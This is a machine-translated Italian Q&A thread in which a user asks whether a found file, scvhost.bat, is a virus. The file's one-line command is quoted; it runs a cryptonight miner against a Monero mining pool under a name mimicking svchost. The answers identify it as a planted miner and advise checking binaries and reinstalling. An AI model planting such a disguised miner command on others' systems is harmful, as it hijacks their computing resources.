Questo scvhost.bat con cryptonight è un virus o un minatore?


17

Ho appena trovato questo file .bat che è stato chiamato scvhost.bat. Il file conteneva questo contenuto:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

È un virus (per rubare informazioni ecc.) O un minatore piantato? Sono preoccupato perché mi diletto anche nelle criptovalute ed stratumè una valuta che è menzionata nel file sopra.


1
Questo in effetti sembra essere un minatore. Dato che usi tu stesso le criptovalute, se anche le mie, assicurati che questo non faccia effettivamente parte di ciò che usi per estrarre. Puoi farlo rinominando l'estensione .bat in qualcos'altro e vedi se riesci ancora a estrarre normalmente dopo un riavvio. Una cosa che trovo strana in questo file è che normalmente si chiamerebbe da solo dato che scvhost è sia il nome di ciò che esegue sia il file bat. Normalmente ciò comporterebbe un ciclo.
LPChip

2
@VirtualAnomaly Penso che ti sbagli sVChost con sCVhost menzionato qui. Sì, sono consapevole che svchost è la meccanica per i servizi di hosting.
LPChip

2
@LPChip Le mie scuse, hai ragione, mi sono sbagliato.
Virtual Anomaly

2
Qualcuno ha giocato troppo a Starcraft, immagino.
CodesInChaos

1
Gli SCV di @lucidbrot sono l'unità "costruttore" di una delle razze del gioco (terran), nel qual caso significa "veicolo da costruzione spaziale".
Aaron,

Risposte:


34

Questo sembra essere un minatore di qualche tipo, soprattutto perché il parametro contiene l'URL di un pool di mining. Tuttavia, devi essere sicuro di cosa c'è nel binario. Avrebbe senso confrontare i checksum del file binario che hai trovato del tuo sistema con i rilasci fatti dal team di sviluppo del minatore. Se differiscono; considera il tuo sistema insicuro.

Un altro problema è che hai scoperto questo minatore (probabilmente perché utilizzava molta CPU), ma non hai idea di cos'altro è successo sul tuo sistema. Se un intruso potesse lanciare il minatore, avrebbe potuto lanciare anche altre cose. Potrebbe essere una buona idea ripristinare dal backup o eseguire comunque una nuova installazione.

Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.